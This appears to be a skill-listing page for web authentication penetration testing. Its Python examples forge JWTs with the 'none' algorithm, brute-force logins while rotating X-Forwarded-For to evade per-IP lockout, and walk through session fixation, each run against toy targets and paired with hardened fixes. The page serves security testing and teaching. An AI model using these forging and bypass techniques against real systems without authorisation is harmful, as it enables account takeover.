Broken Authentication Testing

This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.

Author

zebbern

Category

Other Tools

Install

Download and extract to your skills directory

Copy command and send to OpenClaw for auto-install:

Download and install this skill https://openskills.cc/api/download?slug=sickn33-skills-broken-authentication&locale=en&source=copy

Broken Authentication Testing - Comprehensive Skills for Testing Authentication Vulnerabilities

Skill Overview

Broken Authentication Testing is a penetration testing skill focused on assessing the security of web application authentication and session management. It covers 10 major testing areas, from password policy through session security, and helps security professionals systematically uncover the weaknesses that the OWASP Top 10 groups under Identification and Authentication Failures (A07:2021, formerly Broken Authentication).

Applicable Scenarios

  • Web Application Security Assessment: before enterprise applications go live, or during regular security reviews, comprehensively test the security of authentication features such as login, registration, and password reset to identify high-risk vulnerabilities like account lockout bypass and session fixation.

  • Penetration Testing and Red Team Exercises: simulate real attack scenarios to test brute-force protection, resistance to credential stuffing, JWT token tampering, and other authentication bypass techniques, evaluating how the system holds up against real-world attacks.

  • Support for Security Code Reviews: use code review findings to validate suspected authentication logic flaws in practice, confirming deeper issues such as weak JWT signing, MFA bypasses, and password reset token manipulation.

Core Features

  • In-depth Analysis of Authentication Mechanisms: systematically analyze the application's authentication architecture (passwords, tokens, certificates, multi-factor), identify the authentication endpoints, and capture and analyze authentication requests to lay the groundwork for subsequent vulnerability discovery.

  • 10-stage Comprehensive Testing Process: covers the full authentication security testing chain, including password policy, username enumeration, brute force, credential stuffing, session management, session fixation, session timeout, MFA, and password reset.

  • Practical Exploit Techniques: provides testing methods and payloads for real attack scenarios such as account lockout bypass, JWT "none" algorithm attacks, and password reset token manipulation, which can be used directly for security verification.
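The JWT "none" algorithm attack listed above, as an added worked example in Python (not code from the skill itself): the attacker strips the signature from a legitimately issued HS256 token, sets `alg` to `none` and edits the claims. A verifier that lets the token's own header choose the algorithm accepts the forgery, while one that pins the algorithm server-side rejects it. The key, the claims and all function names are constructed for this demo; the vulnerable verifier lowercases `alg` to mirror libraries that were also caught by case variants such as `None`.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo key; a real application loads this from a secret store.
SERVER_KEY = b"constructed-demo-hmac-key"


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; re-adds the stripped padding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def issue_hs256(payload: dict, key: bytes) -> str:
    """Issue a legitimately signed HS256 token, the way the server would."""
    signing_input = f"{encode_segment({'alg': 'HS256', 'typ': 'JWT'})}.{encode_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_none(token: str, changes: dict) -> str:
    """Attacker step: drop the signature, set alg to none, edit the claims."""
    _, payload_b64, _ = token.split(".")
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(changes)
    # An unsecured JWT has an empty third segment, but the trailing dot stays.
    return f"{encode_segment({'alg': 'none', 'typ': 'JWT'})}.{encode_segment(payload)}."


def _segments(token: str):
    parts = token.split(".")
    return parts if len(parts) == 3 else None


def _hs256_ok(header_b64: str, payload_b64: str, sig_b64: str, key: bytes) -> bool:
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def verify_vulnerable(token: str, key: bytes):
    """Vulnerable verifier: the token's own header decides how it is checked."""
    parts = _segments(token)
    if parts is None:
        return None
    header_b64, payload_b64, sig_b64 = parts
    alg = str(json.loads(b64url_decode(header_b64)).get("alg", "")).lower()
    if alg == "none":  # attacker-controlled value, trusted blindly
        return json.loads(b64url_decode(payload_b64))
    if alg == "hs256" and _hs256_ok(header_b64, payload_b64, sig_b64, key):
        return json.loads(b64url_decode(payload_b64))
    return None


def verify_strict(token: str, key: bytes):
    """Hardened verifier: the algorithm is fixed by the server, never by the token."""
    parts = _segments(token)
    if parts is None:
        return None
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        return None  # anything but the pinned algorithm is rejected outright
    if not _hs256_ok(header_b64, payload_b64, sig_b64, key):
        return None
    return json.loads(b64url_decode(payload_b64))


def demo() -> dict:
    """Run the attack against both verifiers and report what each accepted."""
    legit = issue_hs256({"sub": "alice", "role": "user"}, SERVER_KEY)
    forged = forge_none(legit, {"role": "admin"})
    return {
        "vulnerable_accepts_forgery": verify_vulnerable(forged, SERVER_KEY),
        "strict_accepts_forgery": verify_strict(forged, SERVER_KEY),
        "strict_accepts_legit": verify_strict(legit, SERVER_KEY),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

When testing a real target, capture a valid token, rewrite it the way `forge_none` does, and replay it against an authenticated endpoint; a 200 with the edited claims honoured is the finding. Try the lowercase, capitalised and upper-case spellings of `none`, since libraries have differed in which they matched.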

Frequently Asked Questions

What are common types of authentication vulnerabilities?

The most common include weak password policies, lack of account lockout mechanisms, username enumeration leaks, session fixation, predictable session tokens, missing session timeouts, insecure password reset flows, and MFA bypasses. These vulnerabilities can lead to account takeover, privilege escalation, and other serious consequences.

How to test brute-force protection mechanisms?

Use tools like Hydra or Burp Intruder to run a dictionary attack against the login endpoint and observe whether the application locks the account after repeated failed attempts. Check whether the lockout is keyed on the client IP or on the account, test whether it can be bypassed by rotating headers such as X-Forwarded-For (this only works when the application trusts that header from arbitrary clients), and verify when the CAPTCHA is triggered and whether it actually stops automated attempts.
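The lockout checks described above, as an added example in Python (not code from the skill itself). The target is modelled in-process by a small `LoginService` whose lockout can be keyed on the client IP or on the account and which can be configured to trust X-Forwarded-For; `probe_lockout` replays the dictionary attack that Hydra or Intruder would send, optionally rotating the header on every attempt, and reports whether lockout fired, after how many attempts, and whether the password was still recovered. The wordlist, the account, the service name and the method names are all constructed for the demo; against a real target the same loop would issue HTTP requests instead.

```python
from collections import defaultdict

# Constructed wordlist; the correct password sits at position 10 so that a
# five-failure lockout stops the attack unless it can be bypassed.
WORDLIST = [
    "123456", "password", "qwerty", "letmein", "welcome", "admin",
    "dragon", "monkey", "football", "correct horse", "abc123", "iloveyou",
]


class LoginService:
    """Toy login endpoint standing in for the target application.

    lockout_key="ip" counts failures per client address, "account" per username.
    trust_xff=True makes the service take the client address from X-Forwarded-For,
    which is the misconfiguration the header-rotation bypass relies on.
    """
    MAX_FAILURES = 5

    def __init__(self, lockout_key: str, trust_xff: bool):
        self.users = {"alice": "correct horse"}  # constructed account
        self.failures = defaultdict(int)
        self.lockout_key = lockout_key
        self.trust_xff = trust_xff

    def _client_ip(self, headers: dict, socket_ip: str) -> str:
        if self.trust_xff and "X-Forwarded-For" in headers:
            return headers["X-Forwarded-For"].split(",")[0].strip()
        return socket_ip

    def login(self, username: str, password: str, headers=None,
              socket_ip: str = "203.0.113.5") -> str:
        headers = headers or {}
        key = username if self.lockout_key == "account" else self._client_ip(headers, socket_ip)
        if self.failures[key] >= self.MAX_FAILURES:
            return "locked"
        if self.users.get(username) == password:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "invalid"


def probe_lockout(service: LoginService, username: str, wordlist, rotate_xff: bool) -> dict:
    """Replay a dictionary attack and summarise the lockout behaviour observed."""
    outcomes = []
    for i, guess in enumerate(wordlist):
        # Rotating the header makes every attempt look like a fresh client.
        headers = {"X-Forwarded-For": f"198.51.100.{i}"} if rotate_xff else {}
        outcomes.append(service.login(username, guess, headers))
    return {
        "locked_out": "locked" in outcomes,
        "attempts_before_lock": outcomes.index("locked") if "locked" in outcomes else len(outcomes),
        "password_found": "ok" in outcomes,
    }


if __name__ == "__main__":
    for key, trust, rotate in [("ip", True, True), ("ip", True, False),
                               ("ip", False, True), ("account", True, True)]:
        result = probe_lockout(LoginService(key, trust), "alice", WORDLIST, rotate)
        print(f"lockout_key={key:<8} trust_xff={trust!s:<5} rotate_xff={rotate!s:<5} -> {result}")
```

The per-IP lockout that trusts X-Forwarded-For never fires once the header is rotated, and the password is recovered; the same service without rotation, or with the header ignored, locks after five failures. Note that per-account lockout on its own hands an attacker a denial-of-service lever against legitimate users, so the finding to look for is the combination of per-account throttling, per-IP limits derived from the real connection address, and a CAPTCHA that cannot simply be replayed.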

How is a session fixation attack carried out?

An attacker first obtains an unauthenticated session token and then tricks the victim into logging in with that token (for example by planting it through a URL parameter or a cookie set from a sibling subdomain). If the application does not regenerate the session identifier after login, the attacker's token is now bound to the victim's authenticated session and the attacker can use it to act as the victim. To test, compare the session cookie value before and after login: a secure application issues a new session identifier upon authentication and stops accepting the old one.
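The test and the attack described above, as an added example in Python (not code from the skill itself). A toy `SessionApp` with a server-side session store reproduces the flaw when `regenerate_on_login` is False and the fix when it is True; `check_session_fixation` performs the FAQ's before-and-after cookie comparison, and `fixation_attack` runs the full flow of attacker obtaining an id, victim logging in with it, and attacker presenting it afterwards. The class, method and user names are constructed for the demo.

```python
import secrets


class SessionApp:
    """Toy application with a server-side session store.

    regenerate_on_login=False reproduces the fixation flaw; True is the fix.
    """

    def __init__(self, regenerate_on_login: bool):
        self.sessions = {}  # session id -> {"user": username or None}
        self.regenerate_on_login = regenerate_on_login

    def visit(self, session_id=None) -> str:
        """Anonymous request. Returns the session id the browser ends up holding:
        a known unauthenticated id is kept, otherwise a fresh one is issued."""
        if session_id is None or session_id not in self.sessions:
            session_id = secrets.token_hex(16)
            self.sessions[session_id] = {"user": None}
        return session_id

    def login(self, session_id, username: str) -> str:
        """Authenticate; returns the session id carried by the post-login cookie."""
        session_id = self.visit(session_id)
        if self.regenerate_on_login:
            # Fix: discard the pre-auth session and bind the user to a brand-new id,
            # so any id an attacker planted no longer maps to anything.
            del self.sessions[session_id]
            session_id = secrets.token_hex(16)
        self.sessions[session_id] = {"user": username}
        return session_id

    def whoami(self, session_id):
        """Who the server believes presents this id; None if it is unknown."""
        return self.sessions.get(session_id, {}).get("user")


def check_session_fixation(app: SessionApp) -> bool:
    """The FAQ's test: compare the session id before and after login.
    Returns True when it is unchanged, i.e. the application is vulnerable."""
    pre_auth = app.visit()
    post_auth = app.login(pre_auth, "victim")
    return pre_auth == post_auth


def fixation_attack(app: SessionApp):
    """Full attack flow. Returns the user the attacker is seen as, or None."""
    planted = app.visit()          # attacker obtains an unauthenticated id
    app.login(planted, "victim")   # victim is tricked into logging in with it
    return app.whoami(planted)     # attacker presents the planted id


if __name__ == "__main__":
    for fixed in (False, True):
        app = SessionApp(regenerate_on_login=fixed)
        print(f"regenerate_on_login={fixed}: id unchanged after login = "
              f"{check_session_fixation(app)}, attacker seen as = {fixation_attack(app)!r}")
```

`fixation_attack` checks more than the cookie comparison does: even when a new id is issued, the old one must also be rejected, which is why the test presents the planted id after the victim's login rather than only looking at the new Set-Cookie header.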